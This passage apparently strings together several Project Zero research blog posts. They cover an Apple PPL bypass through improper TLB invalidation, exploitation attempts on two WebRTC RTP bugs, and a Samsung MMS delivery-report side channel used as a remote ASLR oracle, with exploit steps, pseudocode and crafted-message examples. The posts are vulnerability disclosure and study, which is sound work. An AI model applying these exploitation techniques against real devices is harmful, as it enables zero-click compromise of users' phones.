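To make the out-of-bounds range concrete, here is a worked example based on the decompiled index arithmetic above, assuming 16 KB pages and 2048-entry L3 translation tables (2048 × 16 KB = 32 MB per table); the address and size values are hypothetical:

uint64_t va_start = 0x17FFF8000;   /* (va_start >> 14) & 0x7FF == 2046, near the table's end */
uint64_t size     = 4 * 0x4000;    /* 4 pages = 64 KB                                        */

uint64_t l3_index  = (va_start >> 14) & 0x7FF;         /* 2046                              */
uint64_t tte_bytes = (size >> 11) & 0x1FFFFFFFFFFFF8;  /* 4 TTEs * 8 bytes = 32 bytes       */

/* bpte = &l3_table[2046], epte = &l3_table[2050]: the last two "TTEs" processed
 * lie past the end of the 16 KB L3 translation table page. */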

Calling pmap_remove_options_internal() with an address range spanning an L2 TTE boundary (that is, the address range requires two L2 TTEs to map it) will cause the processed TTE array to run off the end of the L3 translation table page, resulting in out-of-bounds TTEs being removed.


But zeroing out-of-bounds TTEs would be a rather annoying primitive to try and leverage for a PPL bypass. Much of the data we'd like to corrupt has probably already been allocated far away from our page tables, and PPL isn't a large enough code base that we're guaranteed to find something interesting we can do just by zeroing memory. And that's to say nothing of the accounting in PPL that would probably detect an attempt to unmap non-existent TTEs!

So instead I chose to focus on a side effect of this out-of-bounds processing: improper TLB invalidation.

Later on in pmap_remove_options_internal(), after the TTEs have been removed, the translation lookaside buffer (TLB) needs to be invalidated in order to ensure that the process cannot continue to access the unmapped pages through stale TLB entries.

    flush_mmu_tlb_region_asid_async(va_start, size, pmap);

This TLB flush occurs on the supplied virtual address range, not the removed TTEs. Thus, there could be a disagreement between the TLB entries invalidated and the L3 TTEs removed if the out-of-bounds TTEs were from a separate region of the process's address space, leaving stale TLB entries for those out-of-bounds TTEs.

By carefully controlling the layout of translation tables, it's possible to transform the out-of-bounds TTE removal into a different bug: improper TLB invalidation. This is because the out-of-bounds TTEs can correspond to discontiguous parts of the virtual address space, causing the set of TTEs removed to differ from the set of TLB entries flushed.


A stale TLB entry would allow a process to continue accessing the physical page after that page has been unmapped and potentially reused for page tables. So if we had a stale TLB entry for an L3 translation table, then we could insert L3 TTEs to map arbitrary PPL-protected pages as writable.

That's pretty much exactly how the PPL bypass works:

  1. Call the kernel function cpm_allocate() to allocate 2 pages of contiguous physical memory called A and B.
  2. Call pmap_mark_page_as_ppl_page() to insert pages A and B at the head of the ppl_page_list so they can be reused for page tables.
  3. Fault in pages for virtual addresses P and Q so that A and B are allocated as L3 TTs for mapping P and Q, respectively. P and Q are discontiguous but have TTEs that are contiguous.
  4. Start a spinner thread bound to a CPU core that reads from page Q in a loop to keep the TLB entry alive.
  5. Call pmap_remove_options() to remove 2 pages starting from virtual address P (which does not include Q). The vulnerability means that TTEs for both P and Q are removed, but only the TLB entry for P is invalidated.
  6. Call pmap_mark_page_as_ppl_page() to insert page Q at the head of the ppl_page_list so it can be reused for page tables.
  7. Fault in a page for virtual address R so that page Q is allocated as an L3 TT for R, even while we continue to have a stale TLB entry for Q.
  8. Using the stale TLB entry, write to page Q to insert an L3 TTE which maps Q itself as writable.

An animation showing the progression of the exploit over time. The vulnerability is used to establish a stale TLB entry for an unmapped page Q which then gets reallocated as an L3 translation table. The stale TLB entry for Q allows us to modify it and insert an L3 TTE mapping Q itself, which can then be used to modify page tables even after the stale TLB entry has been cleared.
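
Expressed as pseudocode, the whole sequence might look something like the sketch below. This is not the actual exploit code: kcall() stands in for the assumed arbitrary kernel function calling primitive, and fault_in(), spin_read_loop(), write_via_stale_tlb() and make_tte() are hypothetical helpers.

kcall(cpm_allocate, ...);                      /* 1. contiguous physical pages A and B     */
kcall(pmap_mark_page_as_ppl_page, page_A_pa);  /* 2. donate A and B to the ppl_page_list   */
kcall(pmap_mark_page_as_ppl_page, page_B_pa);
fault_in(P); fault_in(Q);                      /* 3. A and B become L3 TTs for P and Q     */
spin_read_loop(Q);                             /* 4. keep Q's TLB entry alive              */
kcall(pmap_remove_options,                     /* 5. TTEs for P and Q are removed, but     */
      pmap, P, P + 2 * PAGE_SIZE, 0);          /*    only the TLB entry for P is flushed   */
kcall(pmap_mark_page_as_ppl_page, page_Q_pa);  /* 6. Q goes back on the ppl_page_list      */
fault_in(R);                                   /* 7. Q is reused as an L3 TT for R         */
write_via_stale_tlb(Q, make_tte(page_Q_pa));   /* 8. map Q itself writable via stale TLB   */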


This bypass was reported as Project Zero issue 2035 and fixed in iOS 13.6; you can find a POC that demonstrates how to map arbitrary physical addresses into EL0 there. Also, for a much more detailed look at exploiting improper TLB invalidation, check out Jann Horn's excellent blog post on the topic.

This bug demonstrates a common problem when creating a security boundary where none existed before. It's easy for code to make subtle assumptions about the security model (such as where argument validation occurs or what functionality is exposed vs. private) that no longer hold true under the new model. I wouldn't be surprised to see more bugs along this line in PPL.

Overall, though, I came away from this exercise impressed with the design of PPL. I think it's a sound mitigation with a clear security boundary that doesn't introduce more attack surface. My biggest criticism is that the value-add proposition of PPL is still not clear to me: What real-world attacks does PPL mitigate? Is it simply laying the groundwork for more sophisticated and powerful mitigations to come? Whatever the answer may be, I still prefer having it. Kudos to Apple for an interesting and well-thought-out mitigation.

Exploiting Android Messengers with WebRTC: Part 1

Posted by Natalie Silvanovich, Project Zero

This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down. Part 2 is scheduled for August 5 and Part 3 is scheduled for August 6.

Part 1: First Attempts

WebRTC is an open source video conferencing solution used by a variety of software including browsers, messaging clients and streaming services. While Project Zero has reported several vulnerabilities in WebRTC in the past, it was not clear whether these bugs were exploitable, especially outside of browsers. I investigated whether two recent bugs are exploitable in popular Android messaging applications.

The Bugs


I started off by trying to exploit two bugs, CVE-2020-6389 and CVE-2020-6387.

Both of these vulnerabilities are in WebRTC’s Real-time Transport Protocol (RTP) processing. RTP is the protocol WebRTC uses to transport audio and video content from peer to peer. RTP supports extensions, which are extra pieces of data that can be included in each packet to tell the destination peer how to display or process the data. For example, there is an extension that contains information about the screen orientation of the sending device, and one that contains the volume level. Both of these vulnerabilities occurred in extensions that had been implemented in WebRTC in 2019.

CVE-2020-6389 occurred in the frame marking extension, which contains information on how video content is split into frames. The bug is in how it processes layer information: WebRTC only supports five layers, but the layer number is a three-bit field in the extension, which means it can go as high as seven. This leads to an out-of-bounds write in the following code. temporal_idx is set from the layer number in the extension. 

if (layer_info_it->second[temporal_idx] != -1 &&
    AheadOf<uint16_t>(layer_info_it->second[temporal_idx],
                      frame->id.picture_id)) {
  // Not a newer frame. No subsequent layer info needs update.
  break;
}
...
layer_info_it->second[temporal_idx] = frame->id.picture_id;

The final line of code is where the out-of-bounds write occurs, as the array only contains five elements. This bug also has some limitations that are not obvious from the above code. To start, there is a check before the write that the current value of the memory, cast to a 16-bit unsigned integer, is more than the current sequence number; the write only occurs if this is true. In practice this wasn’t much of a limitation: a crash usually occurred after two or three attempts when I tested it. A more serious limitation is that the layer_info_it->second field has a 64-bit integer type, but frame->id.picture_id is a 16-bit integer. This means that while this bug allows an attacker to write up to three 64-bit integers outside of a fixed-size heap buffer, the values that can be written are very limited, and are too small to represent pointers.

CVE-2020-6387 is a bug in how the video timing extension is processed by Forward Error Correction (FEC). FEC copies incoming RTP packets, and then clears certain extensions when attempting to correct errors. This vulnerability occurs because extensions of the video timing type are not verified to be of the expected length before they are cleared. The code causing this bug is as follows:

case RTPExtensionType::kRtpExtensionVideoTiming: {
  // Nullify 3 last entries: packetization delay and 2 network timestamps.
  // Each of them is 2 bytes.
  uint8_t* p = WriteAt(extension.offset) + VideoSendTiming::kPacerExitDeltaOffset;
  memset(p, 0, 6);
  break;
}

The value of VideoSendTiming::kPacerExitDeltaOffset is 7, so this code writes six zeros from offset 7 to offset 13 from the start of the extension in the packet. However, there is no check that the extension data is more than 13 bytes long, or even that the packet has this number of bytes left. The result of this bug is that an attacker can write up to six zeros to the heap at an offset of up to seven bytes from a variable sized heap buffer. This bug is better than CVE-2020-6389 in some ways and worse in others. It is better in that the heap buffer that can be overflowed is variable size, which gives a lot more options of what can be overwritten by this bug on the heap. The offset also offers some flexibility on where the zeros are written, and the write does not have to be aligned, whereas CVE-2020-6389 requires 64-bit alignment. This bug is worse in that the value written has to be zero, and the size of the area that can be written is smaller (six bytes versus 24).

Moving the Instruction Pointer


I started off by seeing if it was possible to use either of these bugs to move the instruction pointer. Modern Android uses jemalloc, a slab allocator which doesn’t use inline heap headers, so corrupting heap metadata was not an option. Instead, I compiled WebRTC for Android with symbols, and loaded it in IDA. I then went through the available object types to see if there was anything that could obviously be used to move the instruction pointer or improve the capabilities of the bug. I didn’t find anything.

I thought maybe I could use CVE-2020-6389 to overwrite a length and cause a larger overflow, but this had some problems. To start, the bug writes a 64-bit integer, whereas many length fields are 32-bit integers, which means the write also clobbers an adjacent field, and it can only write a non-zero value if the length is 64-bit aligned. The location of the bug in processing is also problematic: the overwrite happens near the end of handling the incoming packet, so many objects are not accessed again after this point and any overwritten memory would never be used. CVE-2020-6389 also overwrites a heap buffer of fixed size 80, which limits the object types that can be affected by this bug. I didn’t think CVE-2020-6387 would be viable for this purpose either, as it can only write zeros, which can only make a length smaller.

I wasn’t sure where to go at this point, so I triggered CVE-2020-6389 a few dozen times on Android to see if there were any crashes at an address wider than 16-bits, hoping they might give me ideas of ways that this bug could influence the behavior of the code other than overwriting a pointer with an invalid 16-bit value. To my surprise, it crashed with the instruction pointer set to a value that had clearly been read off the heap about one in 20 times. 

Analyzing the crash, it turned out that a StunMessage object was being allocated after the overflowed region. The members of the StunMessage class are as follows.

protected:
  std::vector<std::unique_ptr<StunAttribute>> attrs_;
 ...
 private:
  ...
  uint16_t type_;
  uint16_t length_;
  std::string transaction_id_;
  uint32_t reduced_transaction_id_;
  uint32_t stun_magic_cookie_;

So after the vtable, the first member is a vector. How are vectors laid out in memory? It turns out its first two members are as follows.

  pointer __begin_;
  pointer __end_;

These pointers point to the beginning and the end of the vector’s contents in memory. During the crash, the __end_ member was overwritten with a small 16-bit integer. Vector iteration works by starting at the __begin_ pointer and incrementing until the __end_ pointer is reached, so this change means that the next time the vector is iterated over, usually in the destructor, it will go out of bounds. Since this vector contains pointers to StunAttribute objects, which have virtual destructors, destroying each element performs a virtual call. This virtual call on out-of-bounds memory was what was moving the instruction pointer.

This seemed like a reasonable way to control the instruction pointer, except for one problem: in a typical configuration, it is not possible for an attacker at one end of a WebRTC connection to send STUN to the user at the other; instead, they each communicate with their own STUN server. I asked Philipp Hancke of webrtchacks if he knew of a way. He suggested this method, which involves specifying a TCP server controlled by the attacker as a potential routable path between two peers, called an ICE candidate. Both the attacker and target device will then communicate through this server, including STUN messages.

This allowed me to send STUN messages with an unusually large number of attributes. This was necessary because, in order to control the instruction pointer, I would need to control what showed up in memory after the STUN attribute vector. jemalloc groups allocations of similar sizes, determined by predefined size classes, into contiguous memory runs. The less used a size class is, the more likely it is that two objects of the same size class will be allocated one after the other.

Typically, STUN messages have a small number of attributes, which translates to a vector buffer size of 32 or 64 bytes, which are both very frequently used size classes. Instead, I sent STUN messages with 128 attributes, which translated to a vector buffer size of 1024 bytes, which happens to be an infrequently used size class in WebRTC. By sending many STUN messages with this number of attributes, while at the same time sending RTP packets of size 1024 containing the desired pointer value, interspersed with packets containing the bug, I was able to get a virtual call on that pointer value about one in five times. This was good enough for use in an exploit, and I decided to move on to breaking ASLR.

Breaking ASLR


There were two possible approaches for breaking ASLR in this exploit. One was to use one of the above bugs to read memory and send it back to the attacker device or TCP server somehow, the other was to use some sort of crash oracle to determine the memory layout.

I started off by seeing whether it was possible to use one of the bugs to read memory remotely from the target device. Mark Brand suggested that it might be possible to use CVE-2020-6387 to accomplish this by setting the low bytes of a pointer to outgoing data to zero, causing out-of-bounds data to be sent instead of the actual data. This seemed like a promising approach, so I used IDA to look for potential objects.

It turned out there were quite a few, and they all had problems. I spent some time on SendPacketMessageData and DataReceivedMessageData. These objects are used to store pointers to outgoing RTP data while it is queued. They contain a CopyOnWriteBuffer object, and its first member is a ref-counted pointer to an rtc::Buffer object. It was possible to set the bottom bytes of this pointer to be zero using CVE-2020-6387. Unfortunately, the structure of rtc::Buffer made revealing memory this way challenging.

RefCountedObject vtable;
size_t size_;
size_t capacity_;
std::unique_ptr<T[]> data_;

I was hoping that it would be possible to make the clipped pointer to this structure point to some other object on the heap that had a pointer in the location of the data_ member, so that data would get sent instead. However, it turned out that in the process of sending data, all four members of the object above get accessed and need to be reasonably valid. I went through all the available objects in the same size class as the rtc::Buffer class, but couldn’t find one with these exact properties.

I then considered that instead of using a different object, I could use an rtc::Buffer object that had already been freed, with a specific backing buffer size that could be replaced with an object containing pointers using heap manipulation. This didn’t work out either. This was largely an issue of reliability. To start off, an rtc::Buffer object is 36 bytes, which translates to size class 48 in jemalloc, meaning 48 bytes get allocated. Imagining some contiguous allocations of this type, the addresses would be as follows.

0x[...]0000      buffer 0
0x[...]0030      buffer 1
0x[...]0060      buffer 2
0x[...]0090      buffer 3
0x[...]00c0      buffer 4
0x[...]00f0       buffer 5
0x[...]0120      buffer 6
...
   
If the first byte of the address of buffers 0 through 5 is set to zero by the vulnerability, the pointer will still land on a valid buffer, but if the same is done to buffer 6, it will not, because 256 doesn’t divide evenly into 48. The end result is that every time the bug hits the SendPacketMessageData object, there is only a one in three chance it will end up pointing to a valid rtc::Buffer. Hitting the object in the first place is also unreliable, because there are many other allocations of a similar size being made by WebRTC. It’s possible to increase the number of these objects on the heap, and the amount of time before they are sent, by using the TCP server to make the connection very slow, but even then I could only hit the structure less than 10% of the time. Having to manipulate the heap so that there are many freed rtc::Buffer objects in a row in the first place, with their backing buffers replaced by something containing pointers, added even more unreliability. I eventually abandoned this approach because I didn’t think I could get it reliable enough to use in an exploit with a reasonable amount of effort, though I think it’s probably possible. The crash behavior of the application being attacked also matters a lot. This would probably work on an application that respawns immediately in the case of a crash, but would be a lot less practical on an application that stops respawning unless there is a certain delay, which is common on Android.

I also looked a lot at how outgoing packets are generated by WebRTC, especially the RTP Control Protocol (RTCP), which a peer always sends, even if it is just receiving audio or video. However, most outgoing packets are generated on the stack, so it is not possible to alter them using heap corruption bugs.

I also considered using a crash oracle to break ASLR, but I felt it was unlikely to succeed with these specific bugs. To start, hitting a heap allocation with them is unreliable, so it would be difficult to tell whether a crash had occurred due to a specific condition, or just because the bug had failed. I was also unsure whether it would even be possible to create detectable conditions considering the limited capabilities of these bugs.

I also thought about using CVE-2020-6387 to alter a vtable or a function pointer in order to read memory, cause behavior detectable by a crash oracle or perform offset-based exploitation that doesn’t require ASLR to be broken. I decided not to pursue this path, because the end result would depend on which functions and vtables are loaded at locations ending in zero, which varies greatly between builds. An exploit written using this method would require a large amount of modification to work on even slightly different versions of WebRTC, and there is no guarantee it would work at all.

I decided at this point that I needed to look for new bugs that could break ASLR, as neither of the ones I’d found recently could do it easily.

Stay tuned for Part 2: A Better Bug, which is scheduled for Wednesday, August 5.

MMS Exploit Part 4: MMS Primer, Completing the ASLR Oracle

Posted by Mateusz Jurczyk, Project Zero

This post is the fourth of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published and linked here as they are completed.

Introduction

In Part 3 of the series, I chose one of the 174 obvious Qmage memory corruption crashes reported in Issue #2002 for exploitation. It was a linear heap buffer overflow in RLE decompression with an arbitrary allocation size, overflow size, and overflow data. By carefully adjusting the bitmap dimensions (which control the heap region size), we managed to place the pixel storage buffer directly before the associated android::Bitmap object in memory, allowing us to reliably corrupt it. From there, we constructed some potential RCE primitives, as well as a memory oracle that triggers a control flow-neutral read from a chosen memory area, triggering a crash or not depending on whether the address range is mapped and readable. In terms of low-level capabilities, this is a satisfying set of options to continue working with.

To make further progress in the exploit development, we finally have to get familiar with the MMS protocol that we'll be using as the medium of our attack. Specifically, we need to find a way to remotely leak information about the crash of the target Messages app, or lack thereof, to complete the ASLR oracle and build a more complex ASLR bypass logic on top of it. This is not completely trivial considering the unidirectional nature of MMS, but ultimately possible thanks to the little-used feature of delivery reports. However, first things first – let's start by learning more about the protocol itself, and how we can move from sending test messages from a smartphone to programmatically running experiments from the more comfortable environment of one's workstation.

Setting up a test environment

In order to be able to test MMS effectively, we need an easy way to deliver them to the target device from our PC. There are various methods to achieve this; for example, Joshua Drake suggested two ways to send MMS without carriers in his Stagefright Black Hat presentation in 2015 (slides 84-85). However, I decided to take a more practical approach and send all messages through carriers, to be able to observe fully accurate results and spot any real-life issues related to conducting such an attack in practice.

To that end, I purchased two SIM cards for sending and receiving messages, and enabled an "unlimited MMS" package on the sender one to avoid excessive costs. Then, I found and licensed the NowSMS Windows software, which is a powerful solution for sending, receiving, and processing SMS/MMS. It may serve as an SMS server, MMS server, WAP Push Proxy Gateway and Multimedia Messaging Center (MMSC), and has a number of advanced features that are beyond the scope of our use case. Most importantly, it can be used to send messages through a locally connected GSM modem, or an Android phone acting as one. This is precisely the functionality we need, and it's available even in the most basic Now SMS & MMS Lite package. Notably, the service can be used in a number of ways: via a local web interface, through an HTTP API, and through developer APIs made available for technologies such as PHP, Java and .NET (C#, Visual Basic). The vendor also maintains extensive documentation regarding both the product and relevant mobile protocols, and hosts an active user forum. All in all, NowSMS proved extremely helpful in my research by making interactions with SMS/MMS easily accessible on a PC, both manually and programmatically.

The screenshot below shows what the MMS sending page looks like in the Web UI (in Developer Mode). We can immediately spot a number of new and unfamiliar settings which are not available to the user when sending a message on a typical mobile phone. It looks like we have gained much more fine-grained control over what is transmitted over the cellular network:

NowSMS MMS sending web panel

The Android phone acting as a modem may operate in three modes: "Local WiFi", "Remote Direct" and "Remote via Cloud". In my case, I used the Remote Direct mode, and connected the sender phone to the local network via an ethernet cable, to prevent any disruptions related to wireless connectivity. At the same time, I connected the victim phone to my workstation via a USB cable for command line access and screen capturing. The structure of my setup is illustrated below:

Example MMS testing setup

I used a Samsung Galaxy A50 as the modem, and Samsung Galaxy Note 10+ as the receiver. In addition to having them connected to the PC for data transfer, it was obviously necessary to keep them charged throughout the testing, and to ensure that they were placed in a spot with strong cellular signal.

Crafting a raw MMS PDU

Now that we have a solid testing environment setup on a PC, we can dig deeper into MMS itself to better understand how it works. MMS is a relatively old technology dating back to circa 2001-2002, and since its inner workings are relevant mostly to mobile network operators, it is not documented as well as many other technologies and protocols seen in widespread use today. However, throughout this project, I have dug up a number of comprehensive books, articles, presentation slides and other educational materials on the subject. They are listed below for your convenience:


The volume of these resources may seem overwhelming, but in fact, we are only interested in a small subset of the MMS architecture, namely the MM1 protocol used between mobile devices and the MMSC (Multimedia Messaging Service Centre). The Phone to MMSC Protocol (MM1) slides from NowSMS are a highly recommended read to get a good overview of its design. In essence, we can view an MMS message as a self-contained binary file of MIME type application/vnd.wap.mms-message. It contains a number of headers (some of them required, some optional), followed by optional Multipart objects – the actual multimedia content of the message (images, audio, video, etc.). The details of the MMS binary encoding are defined by the MMS Encapsulation Protocol, and the list of headers compatible with the M-Send.req request can be found in that document in section "6.1.1 Send Request" on page 17.

An example source file of an MMS message is shown below:

 1:   X-Mms-Message-Type: m-send-req
 2:   X-Mms-Version: 1.3
 3:   To: 0123456789
 4:   Subject: MMS subject
 5:   X-Mms-Message-Class: Personal
 6:   X-Mms-Priority: Normal
 7:   X-NowMMS-Content-Location: message.txt;text/plain
 8:   X-NowMMS-Content-Location: image.jpg;image/jpeg

Lines 1-3 specify mandatory headers, lines 4-6 specify optional headers, and lines 7-8 contain NowSMS-specific headers that point to the multimedia files to include in the message, and indicate their respective MIME types. Such MMS source can be converted to its binary form with NowSMS mmscomp command line utility:

Composing encapsulated MMS with the mmscomp tool

The first 128 bytes of the message.MMS file are shown below; the rest are just the remainder of the JPEG image contents:

00000000: 8c 80 8d 90 97 30 31 32 33 34 35 36 37 38 39 00  .....0123456789.
00000010: 96 4d 4d 53 20 73 75 62 6a 65 63 74 00 8a 80 8f  .MMS subject....
00000020: 81 84 a3 02 1e 0d 83 c0 22 3c 6d 65 73 73 61 67  ........"<messag
00000030: 65 2e 74 78 74 3e 00 8e 6d 65 73 73 61 67 65 2e  e.txt>..message.
00000040: 74 78 74 00 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64  txt.Hello, world
00000050: 21 1a 84 df 48 9e c0 22 3c 69 6d 61 67 65 2e 6a  !...H.."<image.j
00000060: 70 67 3e 00 8e 69 6d 61 67 65 2e 6a 70 67 00 ff  pg>..image.jpg..
00000070: d8 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00  .....Adobe.d....

In this blob, we can see the binary-encoded headers (for example the two initial 0x8c 0x80 bytes encode "X-Mms-Message-Type: m-send-req"), as well as a number of plaintext strings corresponding to the header values, attachment file names, and data of the embedded files themselves. Such a raw MMS file can be sent via NowSMS, and will be delivered in a very similar form to the recipient device.

As a side note, correctly formatted MMS messages are also expected to contain SMIL (Synchronized Multimedia Integration Language) resources, which define how the multimedia and text should be presented to the user. If you are interested in more details on how they're used in MMS, there is a good tutorial by NowSMS on the subject. However, the SMIL markup seems to be optional in practice, and client apps such as Samsung Messages will correctly display MMS without it. When it comes to file attachments in general, what matters the most for us is that their MIME types are specified explicitly and separately in the encoded message, which enables us to freely send Qmage files marked as image/jpeg (or some other image type) and have them automatically loaded as bitmaps.
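
For example, reusing the NowSMS source-file format shown above, attaching a Qmage file while declaring it as a JPEG could look like the following sketch (the probe.qmg file name is just a placeholder):

X-Mms-Message-Type: m-send-req
X-Mms-Version: 1.3
To: 0123456789
X-NowMMS-Content-Location: probe.qmg;image/jpeg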

MMS delivery reports

Delivery reports have been part of the MMS specification since version 1.0. They enable the sender of a message to request a confirmation of its successful delivery to the recipient. It's one of the very few ways for the sender to receive any kind of (indirect) feedback from the target phone, and it is what we intend to use to complete our ASLR oracle mechanism.

When composing the MMS PDU, a delivery report can be requested by setting the X-Mms-Delivery-Report header to "yes", which is expressed as 0x86 0x81 in binary. Here's how the header is described in Gwenaël Le Bodic's book:

Request for a delivery report. This parameter indicates whether or not delivery report(s) are to be generated for the submitted message. Two values can be assigned to this parameter: 'yes' (delivery report is to be generated) or 'no' (no delivery report requested). If the message class is 'auto', then this parameter is present in the submission PDU and is set to 'no'.
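
In the textual source format used earlier, requesting a report is a single extra header line; when compiled by mmscomp, it becomes the 0x86 0x81 byte sequence mentioned above. A minimal example:

X-Mms-Message-Type: m-send-req
X-Mms-Version: 1.3
X-Mms-Delivery-Report: yes
To: 0123456789
X-NowMMS-Content-Location: image.jpg;image/jpeg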

Quite frankly, I have never legitimately used this feature of MMS before. Even though it's part of the protocol, the option to request delivery reports is missing in some common apps such as Google Messages (it only supports SMS delivery reports). However, Samsung Messages does support it, so we can enable the reports under Settings > More settings > Multimedia messages > Show when delivered, and test it out:

Delivery reports in Samsung Messages

The option does indeed work as advertised. Let's take a deeper look at how it is implemented in the protocol and in the client app, and how we can make use of it in our exploit.

A closer look at MM1

Once again, let me start by emphasizing that Gwenaël's slides 24-41 and the entire NowSMS MM1 slide deck explain the MM1 protocol and data flows in great detail. In our case, let's analyze the transactions involved in sending and receiving an MMS in an environment with a few assumptions:

  • The originator and recipient are both in the same network, so there is no inter-operator communication taking place. Whether this is true or not shouldn't make any practical difference for us, as the data exchange between them happens seamlessly over the MM4 protocol and doesn't have any observable side effects (that I know of).
  • The recipient has the auto-retrieval of MMS enabled, which I understand to be the default on a majority or all of Samsung devices.
  • The recipient has good enough connectivity to be able to download the message.
  • The delivery report is requested by the originator.

Under these conditions, the message exchange between two mobile phones and the MMSC is illustrated in the following diagram:

MM1 data flow when sending a legitimate MMS

In a typical scenario, the sender initiates an M-send.req HTTP POST transaction to the carrier. Once the MMS is transmitted in full, the MMSC sends a WAP PUSH notification to the recipient to announce that a message is awaiting. In the case of auto-retrieve, the client app immediately sends an HTTP GET request, and receives the serialized MMS data in response. Finally, it acknowledges the receipt of the message with a M-notifyresp.ind POST request, and that information is forwarded back to the sender in the form of an M-delivery.ind transaction. This concludes the communication between the participating parties.

The biggest problem shown in the diagram is the fact that the Samsung Messages app parses the incoming MMS before finalizing communication with the MMSC through the M-notifyresp.ind PDU. Ideally, any processing of external data should only take place once the connection with the MMSC is closed. Otherwise, if the app crashes during the processing of a corrupted media file, the final M-notifyresp.ind message is never transmitted, which causes the MMSC to classify the MMS delivery as unsuccessful and prevents it from sending the delivery receipt to the originator. This creates a very easily observable side channel, revealing whether Samsung Messages crashed on the victim phone or not.

MM1 data flow when sending a corrupted Qmage file via MMS

Coupled with the powerful memory-probing primitive constructed in Part 3, the side channel enables an attacker to remotely query the readability of arbitrary address ranges, with no user interaction required. Such a capability is enormously useful on Android due to the Zygote design, and the fact that the location of code and data in the address space is persistent across program crashes. Consequently, even though the ASLR oracle output only carries 1 bit of information at a time, the overall attack can be broken down into multiple steps, and their results combined to determine complete 64-bit addresses of the necessary gadgets.

We can confirm the behavior by checking the logcat logs on the target device. When we send a regular MMS message, we can see both the WSP/HTTP GET.req and M-notifyresp.ind (POST) requests being made:

d2s:/ $ logcat -v time | grep "HTTP: "
07-23 11:25:25.494 D/CS/MmsHttpClient(30665): [<redacted>] HTTP: GET http://<redacted>, proxy=<redacted>, PDU size=0
07-23 11:25:25.548 I/CS/MmsHttpClient(30665): [<redacted>] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F
07-23 11:25:25.548 I/CS/MmsHttpClient(30665): [<redacted>] HTTP: UaProfUrl=http://wap.samsungmobile.com/uaprof/SAMSUNGUAPROF.xml
07-23 11:25:26.449 D/CS/MmsHttpClient(30665): [<redacted>] HTTP: 200 OK
07-23 11:25:27.388 D/CS/MmsHttpClient(30665): [<redacted>] HTTP: response size=66626
07-23 11:25:28.825 D/CS/MmsHttpClient(30665): [<redacted>] HTTP: POST http://<redacted>, proxy=<redacted>, PDU size=16
07-23 11:25:28.831 I/CS/MmsHttpClient(30665): [<redacted>] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F
07-23 11:25:28.831 I/CS/MmsHttpClient(30665): [<redacted>] HTTP: UaProfUrl=http://wap.samsungmobile.com/uaprof/SAMSUNGUAPROF.xml
07-23 11:25:29.155 D/CS/MmsHttpClient(30665): [<redacted>] HTTP: 200 OK
07-23 11:25:29.155 D/CS/MmsHttpClient(30665): [<redacted>] HTTP: response size=0

The time span between receiving the full message from the MMSC and sending the acknowledgement is around 1.5 seconds. On the other hand, when we send a malformed Qmage file, only the WSP/HTTP GET.req request is visible in the logs:

d2s:/ $ logcat -v time | grep "HTTP: "
07-23 11:32:10.890 D/CS/MmsHttpClient(30665): [<redacted>] HTTP: GET http://<redacted>, proxy=<redacted>, PDU size=0
07-23 11:32:10.899 I/CS/MmsHttpClient(30665): [<redacted>] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F
07-23 11:32:10.899 I/CS/MmsHttpClient(30665): [<redacted>] HTTP: UaProfUrl=http://wap.samsungmobile.com/uaprof/SAMSUNGUAPROF.xml
07-23 11:32:11.272 D/CS/MmsHttpClient(30665): [<redacted>] HTTP: 200 OK
07-23 11:32:11.273 D/CS/MmsHttpClient(30665): [<redacted>] HTTP: response size=935

Before M-notifyresp.ind can be sent, the process crashes after ~1.3 seconds of reading the HTTP response:

130|d2s:/ $ logcat -b crash -v time
07-23 11:32:12.585 F/libc    (30665): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414189 in tid 31866 (pool-8-thread-1), pid 30665 (droid.messaging)

This confirms the insecure behavior on the client app side. How does it look from the perspective of an attacker? When the M-delivery.ind PDU is received by NowSMS, it is decoded and saved in a text file with a .HDR extension in the "C:\Program Files (x86)\NowSMS\MMS-IN" directory, for example C0B04508.HDR:

X-NowMMS-RCPT-TO: <redacted>/TYPE=PLMN
X-NowMMS-Modem-Name: NowSMSModem - a50
Message-type: m-delivery-ind
MMS-version: 1.2
Message-id: <redacted>
To: <redacted>/TYPE=PLMN
Date: Thu, 23 Jul 2020 09:55:00 GMT
Status: Retrieved

The status is indicated as "retrieved", and the report can be associated with the original message through the value of the Message-id header. Otherwise, if the original MMS crashes the target phone, we don't see any immediate return messages in the MMS-IN directory. Depending on the MMS expiry period (specified in the headers or defined by the operator's default setting), the carrier may retry to deliver the message, and if that fails, it eventually expires and the sender is notified about it too:

X-NowMMS-RCPT-TO: <redacted>/TYPE=PLMN
X-NowMMS-Modem-Name: NowSMSModem - a50
Message-type: m-delivery-ind
MMS-version: 1.2
Message-id: <redacted>
To: <redacted>/TYPE=PLMN
Date: Thu, 23 Jul 2020 11:03:39 GMT
Status: Expired

The carriers I have experimented with have a default expiration period of 48 hours, and it can be manually adjusted with the X-Mms-Expiry header to values between 1 minute and 48 hours. In my exploit, I didn't use the expiration aspect at all, and simply assumed that Samsung Messages crashed if the delivery report was not received within 30 seconds of sending the message. This completes the construction of a functional MMS-based ASLR oracle, which is an essential building block of a generic ASLR bypass logic discussed in the next blog post in the series.

Further thoughts on oracle reliability

The reliability of the presented ASLR oracle scheme is generally high, provided that both the sender and recipient devices maintain good connectivity with the MMSC. The weakest link is by far the android::Bitmap memory corruption primitive, which relies on two subsequent 160-byte jemalloc allocations being adjacent in memory. This generally holds true, but we have no guarantee that the condition will be always met, especially since the relevant jemalloc bin (chunks between 129-160 bytes in size) is not particularly quiet and is also utilized for other unrelated objects by the Samsung Messages app. Needless to say, any ASLR bypass logic we devise will most likely assume 100% accuracy of the oracle output, so we have to put some extra effort to make sure that the oracle can be indeed relied upon.

